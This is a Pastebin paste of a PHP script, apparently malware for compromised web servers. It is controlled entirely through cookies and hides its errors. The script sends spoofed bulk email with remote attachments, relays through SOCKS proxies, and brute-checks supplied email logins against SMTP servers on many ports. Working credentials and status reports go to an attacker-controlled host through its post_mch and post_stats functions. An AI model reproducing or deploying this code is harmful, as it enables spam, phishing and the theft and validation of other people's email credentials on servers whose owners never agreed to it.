PalmaSolutions

php.php

Mar 15th, 2019
732
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.56 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. $a=$_COOKIE['a'];$ho=urldecode($_COOKIE['ho']);$mx=urldecode($_COOKIE['mx']);$po=$_COOKIE['po'];$ma=urldecode($_COOKIE['ma']);
  6. $lo=urldecode($_COOKIE['lo']);$pa=urldecode($_COOKIE['pa']);$mt=urldecode($_COOKIE['mt']);$cc=urldecode($_COOKIE['cc']);$bc=urldecode($_COOKIE['bc']);
  7. $oc=urldecode($_COOKIE['oc']);$fn=urldecode($_COOKIE['fn']);$or=urldecode($_COOKIE['or']);$eh=urldecode($_COOKIE['eh']);
  8. $sd=urldecode($_COOKIE['sd']);$rt=$_COOKIE['rt'];$ch=urldecode($_COOKIE['ch']);$cm=$_COOKIE['cm'];
  9. $ht=$_COOKIE['ht'];$at=urldecode($_COOKIE['at']);$su=urldecode($_COOKIE['su']);$bo=urldecode($_COOKIE['bo']);
  10. $sh=$_COOKIE['sh'];$sp=$_COOKIE['sp'];$sl=urldecode($_COOKIE['sl']);$sc=urldecode($_COOKIE['sc']);
  11. $dl=urldecode($_COOKIE['dl']);$cp=urldecode($_COOKIE['cp']);$cd=urldecode($_COOKIE['cd']);
  12. $st=$_COOKIE['st'];$sm=urldecode($_COOKIE['sm']);
  13. $mu=$cc.','.$bc.','.$oc;
  14.  
  15. if($a=='r' or $a=='p'){$rel=$ma.':'.$pa;if(substr($ho,0,7)=='stls://'){$ho=substr($ho,7);$ts=1;}}
  16. if($a=='c' or $a=='b' or $a=='l' or $a=='n'){$rel=$ma.':'.$pa;}
  17.  
  18. if($a=='d' or $a=='m'){
  19. $unkhost=$_SERVER['SERVER_NAME'];
  20. if(empty($unkhost)){$unkhost=$_SERVER['HTTP_HOST'];}
  21. if(empty($unkhost)){$unkhost=$_SERVER['SERVER_ADDR'];}
  22. }
  23. if($a=='s'){
  24. $unkhost=$sh;
  25. }
  26. if($a=='d' or $a=='s' or $a=='m'){
  27. $unkhost=mb_strtolower($unkhost);
  28. if(substr($unkhost,0,4)=='www.'){$unkhost=substr($unkhost,4);}
  29. if(filter_var($unkhost, FILTER_VALIDATE_IP)){
  30. $hostip=$unkhost;
  31. $hostname = gethostbyaddr($unkhost);
  32. }else{
  33. $hostname=$unkhost;
  34. $hostip=gethostbyname($unkhost);
  35. }
  36. $pd=$hostname;
  37. $ma=$dl.'@'.$hostname;
  38. }
  39. if($a=='d' or $a=='s'){
  40. $mth=explode("@", $mt);
  41. $ho=$mth[1];
  42. $ho=smtp_lookup($ho);
  43. $po=25;
  44. if(empty($eh)){$eh=$hostname;}
  45. }
  46. if($a=='r' or $a=='p' or $a=='c' or $a=='b' or $a=='l' or $a=='n'){
  47. $ex = explode("@", $ma);
  48. $pd = $ex[1];
  49. if(empty($eh)){$eh=$ex[1];}
  50. }
  51. if($a=='r' or $a=='m' or $a=='p' or $a=='d' or $a=='s'){
  52. if($cc){$mscchead= "Cc: ".str_replace(',', ', ', $cc)."\r\n";$mscc=explode(",",$cc);}
  53. if($bc){$msbchead="Bcc: ".str_replace(',', ', ', $bc)."\r\n";$msbc=explode(",",$bc);}
  54. $bo=str_replace("{br}", "\n", $bo);
  55. if($ht=='1'){$bo='<!doctype html>
  56. <html>
  57. <head>
  58. <title>'.$su.'</title>
  59. <meta http-equiv=Content-Type content="text/html; charset='.$ch.'">
  60. </head>
  61. <body>'.$bo.'</body>
  62. </html>';}
  63. if($cm){
  64. $hfn="=?".$ch."?Q?".str_replace("+","_",str_replace("%","=",urlencode($fn)))."?=";
  65. $hsu="=?".$ch."?Q?".str_replace("+","_",str_replace("%","=",urlencode($su)))."?=";
  66. }else{
  67. $hfn=$fn;
  68. $hsu=$su;
  69. }
  70. }
  71.  
  72. if($a=='m'){
  73. $header="Date: ".date("D, j M Y G:i:s O")."\r\n";
  74.  
  75. if($st=='r2'){$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  76. else if($st=='mf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  77. else if($st=='rf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  78. else {$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";}
  79.  
  80. $header.="Message-ID: <".rand(100000000,9999999999).".".date("YmdHis")."@".$pd.">\r\n";
  81. $header.=$mscchead.$msbchead;
  82. $header.="MIME-Version: 1.0\r\n";
  83. }
  84.  
  85. if($a=='r' or $a=='m' or $a=='p' or $a=='d' or $a=='s'){
  86. if($at){
  87. $atte = explode("^", $at);
  88. $afph=explode("/", $atte[0]);
  89. $affdom=explode(":", $afph[2]);
  90. if(!$affdom[1]){$affdom[1]='80';}
  91. $afp=fsockopen($affdom[0],$affdom[1],$errno,$errstr,$rt);
  92. if (!$afp) {post_stats('A1');exit;}fwrite($afp, "GET ".$atte[0]." HTTP/1.0\r\nHost: ".$affdom[0]."\r\nConnection: Close\r\n\r\n");
  93. while(!feof($afp)){$str=fgets($afp,128);$ach.=$str;if($str=="\r\n"&&empty($he)){$he = 'do';}if($he=='do'){$att_cont.=$str;}}fclose($afp);
  94. $att_cont=substr($att_cont, 2);$ach=explode(" ", $ach);if($ach[1]!='200'){post_stats('A2');exit;}if(!$att_cont){post_stats('A3');exit;}
  95. $attext=explode(".", $atte[1]);
  96. $attct='application/octet-stream';
  97. if($attext[1]=='gif'){$attct='image/gif';}
  98. if($attext[1]=='jpg' OR $attext[1]=='jpeg'){$attct='image/jpeg';}
  99. if($attext[1]=='png'){$attct='image/png';}
  100.  
  101. if (strripos($bo, '{base64attach}') AND $attct!='application/octet-stream' AND $ht=='1') {
  102. $base64attach=base64_encode($att_cont);
  103. $bo = str_replace('{base64attach}', '<img src="data:'.$attct.';base64,'.$base64attach.'" />', $bo);
  104. }else{
  105. $bound='----------'.strtoupper(dechex(rand(10000000,99999999)).dechex(rand(10000000,99999999)).dechex(rand(10,9999)));
  106. if($attext[1]=='htm'){$attct='text/html';}if($attext[1]=='html'){$attct='text/html';}
  107. if($a=='m'){
  108. $ctype.="Content-Type: multipart/mixed;\r\n".' boundary="'.$bound.'"'."\r\n".'--'.$bound."\r\n";
  109. }else{
  110. $ctype.="Content-Type: multipart/mixed;\r\n".' boundary="'.$bound.'"'."\r\n\r\n".'--'.$bound."\r\n";
  111. }
  112. $bo.="\r\n--".$bound."\r\nContent-Type: ".$attct.";\r\n name=".'"'.$atte[1].'"'."\r\nContent-transfer-encoding: base64\r\nContent-Disposition: attachment;\r\n filename=".'"'.$atte[1].'"'."\r\n\r\n";
  113. $bo.=chunk_split(base64_encode($att_cont),76,"\r\n")."--".$bound."--\r\n";
  114. }
  115. }
  116. if($ht=='1'){$ctype.="Content-Type: text/html;";}else{$ctype.="Content-Type: text/plain;";}
  117. $ctype.=" charset=".$ch."\r\nContent-Transfer-Encoding: 8bit\r\n";
  118. }
  119.  
  120. if($a=='m'){
  121. if(mail($mt, $su, $bo, $header.$ctype)){
  122. $mu=$cc.','.$bc;
  123. post_stats('OK');
  124. if($oc){$mu=$oc;$mt='';post_stats('O1');}
  125. }else{
  126. post_stats('P1');
  127. }
  128. exit;
  129. }
  130. if($a=='p' or $a=='s'){
  131. $socks=$sh.':'.$sp;
  132. $fp = fsockopen($sh,$sp,$errno,$errstr,$rt);
  133. $h=pack("H*",'05020002');
  134. fwrite($fp,$h);
  135. $result=bin2hex(fread($fp,4));
  136. if($result == '0500'){$auth="socks5";
  137. }elseif($result == '0502'){
  138. $len_login = chr(strlen($sl));
  139. $len_pass = chr(strlen($sc));
  140. $h=pack("H*","01").$len_login.$sl.$len_pass.$sc;
  141. fwrite($fp,$h);
  142. $result=bin2hex(fread($fp,4));
  143. if($result{3}!=0){
  144. $socks_stat='S1';fclose($fp);
  145. }else{
  146. $auth="socks5";
  147. }}else{
  148. fclose($fp);$fp = fsockopen($sh,$sp,$errno,$errstr,$rt);
  149. $query = pack("C2", 0x04, 0x01).pack("n", $po)._host2int($ho)."0".pack("C", 0);
  150. fwrite($fp,$query);
  151. $l=bin2hex(fread($fp,1024));
  152. $status = substr($l, 2, 2);
  153. IF ($status=="5a"){$auth="socks4";
  154. }ELSEIF ($status=="5b"){
  155. $socks_stat='S3';
  156. }ELSEIF ($status=="5c"){
  157. $socks_stat='S4';
  158. }ELSEIF ($status=="5a"){
  159. $socks_stat='S5';}}
  160. $list="";
  161. if($auth=="socks5"){
  162. $len_h=chr(strlen($ho));
  163. $h=pack("H*","05010003").$len_h.$ho.pack("n",$po);
  164. fwrite($fp,$h);
  165. $result=bin2hex(fread($fp,100));
  166. if($result{3} == 0){$socks_stat='OK';
  167. }elseif($result{3}==1){
  168. $socks_stat='S6';
  169. }elseif($result{3}==2){
  170. $socks_stat='S7';}
  171. elseif($result{3}==3){
  172. $socks_stat='S8';
  173. }elseif($result{3}==4){
  174. $socks_stat='S9';
  175. }elseif($result{3}==5){
  176. $socks_stat='SA';
  177. }elseif($result{3}==6){
  178. $socks_stat='SB';}
  179. elseif($result{3}==7){
  180. $socks_stat='SC';}
  181. elseif($result{3}==8){
  182. $socks_stat='SD';}
  183. else{$socks_stat='SE';}}
  184. elseif($auth=="socks4"){$socks_stat='OK';}
  185. else{$socks_stat='S2';}
  186. if($socks_stat=='OK'){}else{post_stats($socks_stat); fclose($fp); exit;}
  187. }
  188. if($a=='r' or $a=='d'){
  189. $fp = fsockopen($ho,$po,$errno,$errstr,$rt);
  190. }
  191. if($a=='r' or $a=='p' or $a=='d' or $a=='s'){
  192. if(!$fp) {post_stats('E1'); fclose($fp); exit;}$data = get_data($fp);fputs($fp,"EHLO ".$eh."\r\n");
  193. $authcheck=get_data($fp);
  194. $code = substr($authcheck,0,3);if($code!=250){post_stats('E2'); fclose($fp); exit;}
  195. if($a=='d' or $a=='s'){
  196. $code=235;
  197. }
  198. if($a=='r' or $a=='p'){
  199.  
  200. if($ts){
  201. fputs($fp,"STARTTLS\r\n");$code = substr(get_data($fp),0,3);
  202. if($code!=220){post_stats('T1'); fclose($fp); exit;}
  203. stream_socket_enable_crypto($fp, true, STREAM_CRYPTO_METHOD_TLS_CLIENT);
  204. fputs($fp,"EHLO ".$eh."\r\n");$authcheck=get_data($fp);
  205. $code = substr($authcheck,0,3);if($code!=250){post_stats('T2'); fclose($fp); exit;}
  206. }
  207.  
  208. if (strripos($authcheck, 'AUTH') === false) {
  209. $code=235;
  210. }else{
  211.  
  212. if(strripos($authcheck, 'PLAIN')){
  213. fputs($fp,"AUTH PLAIN\r\n");$code = substr(get_data($fp),0,3);
  214. if($code!=334){post_stats('E3'); fclose($fp); exit;}fputs($fp,base64_encode($lo."\0".$lo."\0".$pa)."\r\n");$code = substr(get_data($fp),0,3);
  215. }else if(strripos($authcheck, 'LOGIN')){
  216. fputs($fp,"AUTH LOGIN\r\n");$code = substr(get_data($fp),0,3);
  217. if($code!=334){post_stats('E3'); fclose($fp); exit;}fputs($fp,base64_encode($lo)."\r\n");$code = substr(get_data($fp),0,3);
  218. if($code!=334){post_stats('E4'); fclose($fp); exit;}fputs($fp,base64_encode($pa)."\r\n");$code = substr(get_data($fp),0,3);
  219.  
  220. }else if(strripos($authcheck, 'CRAM-MD5')){
  221. fputs($fp,"AUTH CRAM-MD5\r\n");
  222. $authchal=get_data($fp);
  223. $code = substr($authchal,0,3);
  224. if($code!=334){post_stats('E3'); fclose($fp); exit;}
  225. fputs($fp,base64_encode($lo." ".hash_hmac('MD5', base64_decode(substr($authchal, 4)) ,$pa))."\r\n");$code = substr(get_data($fp),0,3);
  226.  
  227. }else if(strripos($authcheck, 'DIGEST-MD5')){
  228. fputs($fp,"AUTH DIGEST-MD5\r\n");
  229. $authchal=get_data($fp);
  230. $code = substr($authchal,0,3);
  231. if($code!=334){post_stats('E3'); fclose($fp); exit;}
  232. $dec=str_replace('"','',base64_decode(substr($authchal, 4))).',';
  233. $realm=findcont('realm=',',',$dec);$nonce=findcont('nonce=',',',$dec);
  234. $qop=findcont('qop=',',',$dec);$charset=findcont('charset=',',',$dec);
  235. $cnonce=base64_encode(rand(1000,9999).rand(1000,9999).rand(1000,9999));
  236. $duri='smtp/'.$ho.'/'.$pd;
  237. if($charset=='utf-8'){
  238. $ch_lo=iconv("ISO-8859-1","UTF-8", $lo);$ch_pa=iconv("ISO-8859-1","UTF-8", $pa);$res='charset=utf-8,username="'.$ch_lo.'"';
  239. }else{
  240. $ch_lo=$lo;$ch_pa=$pa;$res='username="'.$ch_lo.'"';
  241. }
  242. $res.=',realm="'.$realm.'",nonce="'.$nonce.'",nc=00000001,cnonce="'.$cnonce.'",digest-uri="'.$duri.'"';
  243. $ha1=MD5(pack('H*',MD5($ch_lo.":".$realm.":".$ch_pa)).":".$nonce.":".$cnonce);
  244. if($qop=="auth"){$ha2=MD5("AUTHENTICATE:".$duri);}else{$ha2=MD5("AUTHENTICATE:".$duri.":00000000000000000000000000000000");}
  245. $response=MD5($ha1.':'.$nonce.':00000001:'.$cnonce.':auth:'.$ha2);
  246. $res.=',response='.$response.'';
  247. $res.=',qop='.$qop;
  248. fputs($fp,base64_encode($res)."\r\n");$code = substr(get_data($fp),0,3);
  249. if($code==334){fputs($fp,"\r\n");$code = substr(get_data($fp),0,3);}
  250. }
  251. }
  252. }
  253. if($code!=235){post_stats('E5'); fclose($fp); exit;}
  254.  
  255. if($oc){$mt=$mt.",".$oc;}
  256. $mtex=explode(",",$mt);
  257.  
  258. if($mscc){$mscc=array_chunk($mscc,ceil(count($mscc)/count($mtex)));}
  259. if($msbc){$msbc=array_chunk($msbc,ceil(count($msbc)/count($mtex)));}
  260.  
  261. $arch=0;
  262. foreach($mtex as $mt){
  263. $mu='';
  264. $mscchead='';$msbchead="";
  265. if($mscc[$arch]){$mscchead="Cc: ".implode(", ",$mscc[$arch])."\r\n";$mu.=implode(",",$mscc[$arch]).',';}
  266. if($msbc[$arch]){$msbchead="Bcc: ".implode(", ",$msbc[$arch])."\r\n";$mu.=implode(",",$msbc[$arch]).',';}
  267.  
  268. if(!$dd){
  269. $header="Date: ".date("D, j M Y G:i:s O")."\r\n";
  270. if($st=='r2'){$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  271. else if($st=='mf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  272. else if($st=='rf'){$header.="From: ".'"'.$hfn.'"'." <".$sm.">\r\n";$header.="Reply-To: ".'"'.$hfn.'"'." <".$sm.">\r\n";}
  273. else {$header.="From: ".'"'.$hfn.'"'." <".$ma.">\r\n";}
  274. $header.="Organization: ".$or."\r\n";
  275. $header.="X-Priority: 3 (Normal)\r\n";
  276. $header.="Message-ID: <".rand(100000000,9999999999).".".date("YmdHis")."@".$pd.">\r\n";
  277. $header.="To: ".$mt."\r\n";
  278. $header.=$mscchead.$msbchead."Subject: ".$hsu."\r\n";
  279. $header.="MIME-Version: 1.0\r\n";
  280. $size_msg=strlen($header.$ctype."\r\n".$bo);fputs($fp,"MAIL FROM:<".$ma."> SIZE=".$size_msg."\r\n");$code = substr(get_data($fp),0,3);
  281. if($code!=250){post_stats('E6'); fclose($fp); $dd=1;$arch++;continue;}fputs($fp,"RCPT TO:<".$mt.">\r\n");$code = substr(get_data($fp),0,3);
  282. if($mscc[$arch]){foreach($mscc[$arch] as $mcc){
  283. if($code!=250){post_stats('E7'); fclose($fp); $dd=1;$arch++;continue 2;}fputs($fp,"RCPT TO:<".$mcc.">\r\n");$code = substr(get_data($fp),0,3);}}
  284. if($msbc[$arch]){foreach($msbc[$arch] as $mbc){
  285. if($code!=250){post_stats('E7'); fclose($fp); $dd=1;$arch++;continue 2;}fputs($fp,"RCPT TO:<".$mbc.">\r\n");$code = substr(get_data($fp),0,3);}}
  286. if($code!=250 AND $code!=251){post_stats('E7'); fclose($fp);$dd=1;}fputs($fp,"DATA\r\n");$code = substr(get_data($fp),0,3);
  287. if($code!=354){post_stats('E8'); fclose($fp); $dd=1;$arch++;continue;}fputs($fp,$header.$ctype."\r\n".$bo."\r\n.\r\n");$code = substr(get_data($fp),0,3);
  288. if($code!=250){post_stats('E9'); fclose($fp); $dd=1;$arch++;continue;}post_stats('OK');
  289. }
  290. if($dd){post_stats('O2');}
  291. $arch++;
  292. }
  293. if(!$dd){fputs($fp,"QUIT\r\n");fclose($fp);}
  294. }
  295. if($a=='c' or $a=='b' or $a=='l' or $a=='n'){
  296. $cports=explode(",",$cp);
  297. $cdoms=explode(",",$cd);
  298. if($ho and $po and $lo){
  299. mch($ho,$po,$lo,$pa);
  300. post_mch($sd,'C3',$rel);}
  301. $mh = explode("@", $ma);$em = $mh[0];$ho = $mh[1];
  302. if($a=='c'){
  303. $ping = fsockopen($ho,80,$errno,$errstr,$rt);
  304. if(!$ping){post_mch($sd,'C1',$rel);}
  305. fclose($ping);
  306. }
  307. if($a=='c' or $a=='l' or $a=='n'){
  308. if(($a=='l' or $a=='n') and $mx){$smtp=$mx;}else{$smtp=smtp_lookup($ho);}
  309. if($smtp){
  310. foreach($cports as $cport){
  311. $encho=$smtp;
  312. if(substr($cport,0,1)=='s'){$encho="ssl://".$encho;}
  313. if(substr($cport,0,1)=='t'){$encho="tls://".$encho;}
  314. if(substr($cport,0,1)=='r'){$encho="stls://".$encho;}
  315. $try=mch($encho,substr($cport, 1),$em,$pa);
  316. if($try=='BAUTH'){$try=mch($encho,substr($cport, 1),$ma,$pa);}
  317. }
  318. }
  319. }
  320. foreach($cports as $cport){
  321. foreach($cdoms as $cdom){
  322. if($cdom){
  323. $encho=$cdom.".".$ho;
  324. }else{
  325. $encho=$ho;
  326. }
  327. if(substr($cport,0,1)=='s'){$encho="ssl://".$encho;}
  328. if(substr($cport,0,1)=='t'){$encho="tls://".$encho;}
  329. if(substr($cport,0,1)=='r'){$encho="stls://".$encho;}
  330. $try=mch($encho,substr($cport, 1),$em,$pa);
  331. if($try=='BAUTH'){$try=mch($encho,substr($cport, 1),$ma,$pa);}
  332. }
  333. }
  334. post_mch($sd,'C2',$rel);
  335. }
  336. function post_stats($stat){global $rt, $sd, $rel, $socks, $mt, $at, $mu;
  337. $host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}
  338. $data='st='.$stat.';rl='.urlencode($rel).';mt='.urlencode($mt).';sh='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']).';so=A1;sk='.$socks.';at='.$at.';mu='.$mu;
  339. $socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $rt, "usec" => 0));
  340. if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{socket_write($socket, "GET http://".$sd."/post.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}}
  341. function _host2int($host){$ip = gethostbyname($host);if(preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/", $ip, $matches)){$retVal = pack("C4", $matches[1], $matches[2], $matches[3], $matches[4]);}return $retVal;}
  342.  
  343. function mch($host,$port,$mail,$pass){
  344. global $rt,$rel,$eh,$sd,$pd,$sh,$sp,$sl,$sc,$a;
  345. if(substr($host,0,7)=='stls://'){$host=substr($host,7);$ts=1;}
  346.  
  347. if($a=='n'){
  348. $fp = fsockopen($sh,$sp,$errno,$errstr,$rt);
  349. $h=pack("H*",'05020002');
  350. fwrite($fp,$h);
  351. $result=bin2hex(fread($fp,4));
  352. if($result == '0500'){$auth="socks5";
  353. }elseif($result == '0502'){
  354. $len_login = chr(strlen($sl));
  355. $len_pass = chr(strlen($sc));
  356. $h=pack("H*","01").$len_login.$sl.$len_pass.$sc;
  357. fwrite($fp,$h);
  358. $result=bin2hex(fread($fp,4));
  359. if($result{3}!=0){
  360. $socks_stat='S1';fclose($fp);
  361. }else{
  362. $auth="socks5";
  363. }}else{
  364. fclose($fp);$fp = fsockopen($sh,$sp,$errno,$errstr,$rt);
  365. $query = pack("C2", 0x04, 0x01).pack("n", $port)._host2int($host)."0".pack("C", 0);
  366. fwrite($fp,$query);
  367. $l=bin2hex(fread($fp,1024));
  368. $status = substr($l, 2, 2);
  369. IF ($status=="5a"){$auth="socks4";
  370. }ELSEIF ($status=="5b"){
  371. $socks_stat='S3';
  372. }ELSEIF ($status=="5c"){
  373. $socks_stat='S4';
  374. }ELSEIF ($status=="5a"){
  375. $socks_stat='S5';}}
  376. $list="";
  377. if($auth=="socks5"){
  378. $len_h=chr(strlen($host));
  379. $h=pack("H*","05010003").$len_h.$host.pack("n",$port);
  380. fwrite($fp,$h);
  381. $result=bin2hex(fread($fp,100));
  382. if($result{3} == 0){$socks_stat='OK';
  383. }elseif($result{3}==1){
  384. $socks_stat='S6';
  385. }elseif($result{3}==2){
  386. $socks_stat='S7';}
  387. elseif($result{3}==3){
  388. $socks_stat='S8';
  389. }elseif($result{3}==4){
  390. $socks_stat='S9';
  391. }elseif($result{3}==5){
  392. $socks_stat='SA';
  393. }elseif($result{3}==6){
  394. $socks_stat='SB';}
  395. elseif($result{3}==7){
  396. $socks_stat='SC';}
  397. elseif($result{3}==8){
  398. $socks_stat='SD';}
  399. else{$socks_stat='SE';}}
  400. elseif($auth=="socks4"){$socks_stat='OK';}
  401. else{$socks_stat='S2';}
  402. if($socks_stat=='OK'){}else{fclose($fp);return ("BHOST");}
  403. }
  404.  
  405. if($a=='c' or $a=='b' or $a=='l'){
  406. $fp = fsockopen($host,$port,$errno,$errstr,$rt);
  407. }
  408.  
  409. if(!$fp) {fclose($fp);return ("BHOST");}
  410. $data = get_data($fp);
  411.  
  412. fputs($fp,"EHLO ".$eh."\r\n");
  413. $authcheck=get_data($fp);
  414.  
  415. $code = substr($authcheck,0,3);if($code != 250) {fclose($fp);return("BAUTH");}
  416.  
  417. if($ts){
  418. fputs($fp,"STARTTLS\r\n");$code = substr(get_data($fp),0,3);
  419. if($code!=220){fclose($fp);return("BAUTH");}
  420. stream_socket_enable_crypto($fp, true, STREAM_CRYPTO_METHOD_TLS_CLIENT);
  421. fputs($fp,"EHLO ".$eh."\r\n");$authcheck=get_data($fp);
  422. $code = substr($authcheck,0,3);if($code!=250){fclose($fp);return("BAUTH");}
  423. }
  424.  
  425. if(strripos($authcheck, 'PLAIN')){
  426. fputs($fp,"AUTH PLAIN\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");}
  427. fputs($fp,base64_encode($mail."\0".$mail."\0".$pass)."\r\n");$code = substr(get_data($fp),0,3);
  428.  
  429. }else if(strripos($authcheck, 'LOGIN')){
  430. fputs($fp,"AUTH LOGIN\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");}
  431. fputs($fp,base64_encode($mail)."\r\n");$code = substr(get_data($fp),0,3);if($code != 334) {fclose($fp); return ("BAUTH");}
  432. fputs($fp,base64_encode($pass)."\r\n");$code = substr(get_data($fp),0,3);
  433.  
  434. }else if(strripos($authcheck, 'CRAM-MD5')){
  435. fputs($fp,"AUTH CRAM-MD5\r\n");
  436. $authchal=get_data($fp);
  437. $code = substr($authchal,0,3);
  438. if($code != 334) {fclose($fp); return ("BAUTH");}
  439. fputs($fp,base64_encode($mail." ".hash_hmac('MD5', base64_decode(substr($authchal, 4)) ,$pass))."\r\n");$code = substr(get_data($fp),0,3); //login
  440.  
  441. }else if(strripos($authcheck, 'DIGEST-MD5')){
  442. fputs($fp,"AUTH DIGEST-MD5\r\n");
  443. $authchal=get_data($fp);
  444. $code = substr($authchal,0,3);
  445. if($code != 334) {fclose($fp); return ("BAUTH");}
  446. $dec=str_replace('"','',base64_decode(substr($authchal, 4))).',';
  447. $realm=findcont('realm=',',',$dec);$nonce=findcont('nonce=',',',$dec);
  448. $qop=findcont('qop=',',',$dec);$charset=findcont('charset=',',',$dec);
  449. $cnonce=base64_encode(rand(1000,9999).rand(1000,9999).rand(1000,9999));
  450. $duri='smtp/'.$host.'/'.$pd;
  451. if($charset=='utf-8'){
  452. $ch_lo=iconv("ISO-8859-1","UTF-8", $mail);$ch_pa=iconv("ISO-8859-1","UTF-8", $pass);$res='charset=utf-8,username="'.$ch_lo.'"';
  453. }else{$ch_lo=$mail;$ch_pa=$pass;$res='username="'.$ch_lo.'"';}
  454. $res.=',realm="'.$realm.'",nonce="'.$nonce.'",nc=00000001,cnonce="'.$cnonce.'",digest-uri="'.$duri.'"';
  455. $ha1=MD5(pack('H*',MD5($ch_lo.":".$realm.":".$ch_pa)).":".$nonce.":".$cnonce);
  456. if($qop=="auth"){$ha2=MD5("AUTHENTICATE:".$duri);}else{$ha2=MD5("AUTHENTICATE:".$duri.":00000000000000000000000000000000");}
  457. $response=MD5($ha1.':'.$nonce.':00000001:'.$cnonce.':auth:'.$ha2);
  458. $res.=',response='.$response.'';
  459. $res.=',qop='.$qop;
  460. fputs($fp,base64_encode($res)."\r\n");$code = substr(get_data($fp),0,3);
  461. if($code==334){fputs($fp,"\r\n");$code = substr(get_data($fp),0,3);}
  462. }
  463. if($code != 235) {fclose($fp); return ("BAUTH");}fclose($fp);
  464. if($ts){$host="stls://".$host;}
  465. post_mch($sd,'OK',$rel.';||'.$host.'||'.$port.'||'.$mail.'||'.$pass);
  466. }
  467.  
  468. function findcont($s,$f,$t){$l=strlen($s);$sf=strpos($t,$s);if($sf===false){}else{$o=substr($t,$sf+$l);$ef=strpos($o,$f);if($ef){$out=substr($t,$sf+$l,$ef);}}return $out;}
  469. function smtp_lookup($host){if(function_exists("getmxrr")){getmxrr($host,$mxhosts,$mxweight);return $mxhosts[0];}else{win_getmxrr($host,$mxhosts,$mxweight);return $mxhosts[3];}}
  470. function win_getmxrr($hostname, &$mxhosts, &$mxweight=false){if(strtoupper(substr(PHP_OS, 0, 3))!='WIN') return;if(!is_array($mxhosts)) $mxhosts=array();
  471. if(empty($hostname)) return;$exec='nslookup -type=MX '.escapeshellarg($hostname);@exec($exec,$output);if(empty($output)) return;$i=-1;foreach($output as $line){$i++;
  472. if(preg_match("/^$hostname\tMX preference = ([0-9]+), mail exchanger = (.+)$/i",$line,$parts)){$mxweight[$i]=trim($parts[1]);$mxhosts[$i]=trim($parts[2]);}
  473. if(preg_match('/responsible mail addr = (.+)$/i',$line,$parts)){$mxweight[$i]=$i;$mxhosts[$i]=trim($parts[1]);}}return($i!=-1);}
  474. function get_data($fp){$data="";while($str=fgets($fp,515)){$data.=$str;if(substr($str,3,1)==" "){break;}}return $data;}
  475. function post_mch($sd,$stat,$rel){global $rt,$sh,$sp;$shl=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$rel=urlencode($rel);
  476. $host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}$data='st='.$stat.';rl='.$rel.';sk='.$sh.':'.$sp.';sh='.$shl.';so=C2';
  477. $socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $rt, "usec" => 0));
  478. if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{
  479. socket_write($socket, "GET http://".$sd."/cpost.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}die();}
  480. ?>
Advertisement
Add Comment
Please, Sign In to add comment